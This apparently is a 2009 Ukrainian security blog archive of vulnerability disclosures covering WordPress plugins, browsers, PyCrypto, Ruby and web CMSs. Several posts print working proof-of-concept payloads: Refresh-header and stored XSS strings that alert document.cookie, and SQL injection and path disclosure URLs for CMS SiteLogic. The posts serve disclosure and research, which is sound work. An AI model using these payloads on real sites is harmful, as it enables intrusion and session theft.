Архів за Червень, 2009

Уразливості в плагінах для WordPress №19

23:59 30.06.2009

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах DM Albums і Related Sites. Для котрих з’явилися експлоіти. DM Albums - це плагін для створення фото альбомів та галерей, Related Sites - це плагін для показу лінок на сайти інших користувачів даного плагіна.

  • WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln (деталі)
  • WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability (деталі)
  • WordPress Plugin Related Sites 2.1 Blind SQL Injection Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

P.S.

Експлоіт до плагіна Related Sites неробочий, тому що заявлена SQL Injection уразливість відсутня. Тому власники даного плагіна можуть не переживати з приводу цього експлоіта.

Секюріті дослідження та законодавство

22:44 30.06.2009

В цьому місяці я написав статтю про секюріті дослідження в Інтернеті, зокрема про знаходження уразливостей на веб сайтах та їх оприлюднення, а також про хакінг веб сайтів, та їх відповідність законодавству. Дана стаття була опублікована в The Web Security Mailing List в двох частинах 07.06.2009 та 14.06.2009.

Сьогодні я розмістив на сайті мою статтю на англійській мові (об’єднавши дві частини в одну статтю) та її переклад на українську мову. З якою ви можете ознайомитися.

Хакінг веб сайтів, секюріті дослідження, оприлюднення та законодавство

Зміст.

1. Передмова.
2. Знаходження уразливостей.
3. Хакінг веб сайтів.
4. Оприлюднення уразливості.
5. Приклади законів данної тематики.
6. Рекомендації по легальним секюріті дослідженням.
7. Інші цікаві аспекти веб безпеки та законодавства.

Hacking of web sites, security researches, disclosure and legislation

Table of contests.

1. Foreword.
2. Finding of vulnerabilities.
3. Hacking of web sites.
4. Vulnerability disclosure.
5. Examples of laws on this subject.
6. Guidelines for legal security researches.
7. Other interesting aspects of web security and legislation.

DoS в модулі Python PyCrypto

20:34 30.06.2009

Виявлена DoS уразливість в модулі Python PyCrypto.

Уразливі версії: Python PyCrypto 2.0.

Відмова при обробці ключа ARC2.

Добірка уразливостей

16:15 30.06.2009

В даній добірці уразливості в веб додатках:

  • Vulnerabilities in Timbuktu Pro 8.6.5 (деталі)
  • Timbuktu Pro Remote Path Traversal and Log Injection (деталі)
  • The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities (деталі)
  • Multiple vulnerabilities in TietoEnator’s Procapita school administration system, at least version “842 Procapita 840SP1″ (деталі)
  • Relative Real Estate Systems <= 3.0 (listing_id) Sql Injection Vulnerability (деталі)
  • RSS-aggregator (display) Remote File Inclusion Vulnerability (деталі)
  • IdeBox (include) Remote File Inclusion Vulnerability (деталі)
  • mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability (деталі)
  • NULL pointer in Remotely Anywhere 8.0.668 (деталі)
  • WellyBlog Open Source Blog Portal Cross Site Scripting Vulnerabilitiy (деталі)

Cross-Site Scripting уразливості в Mozilla, Internet Explorer, Opera та Chrome

23:54 29.06.2009

Учора, 28.06.2009, я виявив Cross-Site Scripting уразливості в різних браузерах, зокрема в Mozilla, Internet Explorer, Opera та Chrome.

21.04.2009 в Firefox 3.0.9 була виправлена уразливість, що дозволяла проводити XSS атаки через заголовок Refresh (дивно, що тількі зараз Мозіла її виправила). І як я перевірив, дана атака також працює в браузерах Mozilla, IE6, Opera та Chrome. Що дозволяє проводити XSS атаки через численні refresh-header редиректори в даних браузерах.

XSS:

При запиті до скрипта на сайті:
http://site/script.php?param=javascript:alert(document.cookie)
Що поверне у відповіді заголовок Refresh:
Refresh: 0; URL=javascript:alert(document.cookie)
Код спрацює в контексті даного сайту.

Уразлива версія Mozilla 1.7.x та попередні версії.

Уразлива версія Mozilla Firefox 3.0.8 та попередні версії.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) та попередні версії. І потенційно наступні версії (IE7 та IE8).

Уразлива версія Opera 9.52 та попередні версії (і потенційно наступні версії).

Уразлива версія Google Chrome 1.0.154.48 та попередні версії (і потенційно наступні версії).

DoS проти Ruby

22:43 29.06.2009

Виявлена DoS уразливість в Ruby.

Уразливі версії: Ruby 1.8.

Відмова на довгому рядку в BigDecimal.

Уразливості в LinksExchanger

19:32 29.06.2009

08.04.2009

У липні, 18.07.2008, я виявив Cross-Site Scripting уразливості в LinksExchanger. Це скрипт каталога лінок. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

29.06.2009

XSS:

POST запит на сторінці http://site/links/submit.php
"><body onload="alert(document.cookie)В полях: Ваше имя или ник, Текстовое описание Вашей ссылки.

Це persistent XSS - при заході на сторінку submit.php код спрацьовує знову (для поточної сесії).

Уразливі LinksExchanger 2.0 та попередні версії.

Добірка експлоітів

16:11 29.06.2009

В даній добірці експлоіти в веб додатках:

  • NatterChat 1.12 (natterchat112.mdb) Database Disclosure Vulnerability (деталі)
  • w3blabor CMS 3.0.5 Arbitrary File Upload & LFI Exploit (деталі)
  • SIU Guarani Multiple Remote Vulnerabilities (деталі)
  • XOOPS 2.3.1 Multiple Local File Inclusion Vulnerabilities (деталі)
  • MG2 0.5.1 (filename) Remote Code Execution Vulnerability (деталі)
  • DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit (деталі)
  • WebCAF <= 1.4 (LFI/RCE) Multiple Remote Vulnerabilities (деталі)
  • Neostrada Livebox Router Remote Network Down PoC Exploit (деталі)
  • phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit (деталі)
  • Secure Downloads v2.0.0r for vBulletin SQL Injection Vulnerability (деталі)
  • XAMPP 1.6.8 (XSRF) Change Administrative Password Exploit (деталі)
  • Simple Directory Listing 2 Cross Site File Upload Vulnerability (деталі)
  • phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability (деталі)
  • PHP Multiple Newsletters 2.7 (LFI/XSS) Multiple Vulnerabilities (деталі)
  • PHPmyGallery 1.5beta (common-tpl-vars.php) LFI/RFI Vulnerabilities (деталі)

Уразливості в CMS SiteLogic

23:55 27.06.2009

У березні, 03.03.2008, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості в CMS SiteLogic (це українська комерційна CMS). Уразливості виявив на сайті http://prp.org.ua. Про наявність уразливостей в їх CMS я неодноразово повідомляв розробникам CMS SiteLogic.

SQL Injection:

http://site/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1

Full path disclosure:

http://site/index.php?mid=’

http://site/includes/stat.php

XSS:

http://site/index.php?mid=10&action=news_full&search_item=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/index.php?mid=45&action=search_list&str=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS атаки через файли зображень

22:47 27.06.2009

Продовжуючи розпочату традицію, після попереднього відео про локальне включення файлу через JPG, пропоную новий відео секюріті мануал. Цього разу відео про XSS атаки через файли зображень. Рекомендую подивитися всім хто цікавиться цією темою.

XSS injection in image formats

Якщо в попередньому відео ролику демонструвалася LFI атака через jpg файл, то в даному відео ролику демонструється XSS атака через файли зображень (зокрема через png файл). Тобто на сайт завантажується зображення в форматі png, в якому розміщений JavaScript (або VBScript) код.

І при перегляді даного файлу в Internet Explorer цей код виконається (що є давно відомою особливістю IE). Рекомендую подивитися дане відео для розуміння векторів Cross-Site Scripting атак, зокрема через файли зображень.